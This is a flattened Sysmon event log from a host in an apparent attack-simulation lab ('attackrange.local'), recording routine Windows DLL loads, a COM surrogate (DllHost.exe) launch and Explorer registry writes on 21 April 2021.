19:19:09.390{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606810Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.390{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 734700x80000000000000001606809Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.389{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606808Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.389{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606807Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.388{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606806Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.384{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606805Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.383{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606804Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 10341000x80000000000000001606803Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-84C5-607D-E100-00000000BB01}32203420C:\Windows\system32\csrss.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 734700x80000000000000001606802Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606801Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606800Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606799Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeMD5=DA63852A2B0340E94D74EAF0CD444979,SHA256=EE8364C07B3F4F71FA649E0E6C4C73C15D285130E4B16E79890EEBBF89C2164EtrueMicrosoft WindowsValid 10341000x80000000000000001606798Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606797Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.352{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606796Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.342{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}C:\Windows\system32\WIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=DA63852A2B0340E94D74EAF0CD444979,SHA256=EE8364C07B3F4F71FA649E0E6C4C73C15D285130E4B16E79890EEBBF89C2164E{21761711-83AD-607D-0C00-00000000BB01}724C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 13241300x80000000000000001606795Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606794Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606793Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.305{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001606792Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationmsvcp140.dllMD5=A1D30EF2114E18E26E2BB96555BE81BF,SHA256=F87819AE8C6F7C90D3237A1ABB9809E8CBA9DCD0C80AC3F0969A5E68EF652CA4trueMicrosoft CorporationValid 734700x80000000000000001606791Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5trueMicrosoft CorporationValid 734700x80000000000000001606790Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140_1.dll14.24.28127.4 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774trueMicrosoft CorporationValid 734700x80000000000000001606789Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll16.0.13127.21452Microsoft Office Shell Extension HandlersMicrosoft OfficeMicrosoft Corporationmsoshext.dllMD5=FA08E1A12DBD5DEFA00E5C10C7756F3D,SHA256=E4309D89987239A908DB9BA46DC399B952CDB764ACD8DC3E7FD35278DCD4AB96trueMicrosoft CorporationValid 13241300x80000000000000001606788Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.268{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606787Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.268{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606786Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.252{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606785Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.252{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001606784Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606783Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 13241300x80000000000000001606782Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A06F8\VirtualDesktopBinary Data 12241200x80000000000000001606781Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A06F8 12241200x80000000000000001606780Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance 12241200x80000000000000001606779Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance 12241200x80000000000000001606778Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance 12241200x80000000000000001606777Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance 12241200x80000000000000001606776Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001606775Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.205{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 12241200x80000000000000001606774Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 13241300x80000000000000001606769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7LayoutBinary Data 12241200x80000000000000001606768Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser 12241200x80000000000000001606767Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 13241300x80000000000000001606766Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon\QatItemsBinary Data 13241300x80000000000000001606765Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon\MinimizedStateTabletModeOffDWORD (0x00000001) 12241200x80000000000000001606764Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon 12241200x80000000000000001606763Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.152{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon 12241200x80000000000000001606762Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 13241300x80000000000000001606761Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\LockedDWORD (0x00000001) 12241200x80000000000000001606760Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar 12241200x80000000000000001606759Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606758Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606757Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606756Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606755Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606754Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606753Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606752Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606751Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606750Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606749Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606748Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListExBinary Data 12241200x80000000000000001606747Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 13241300x80000000000000001606746Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlotsBinary Data 12241200x80000000000000001606745Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.121{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU 12241200x80000000000000001606744Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.105{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 13241300x80000000000000001606743Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.105{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 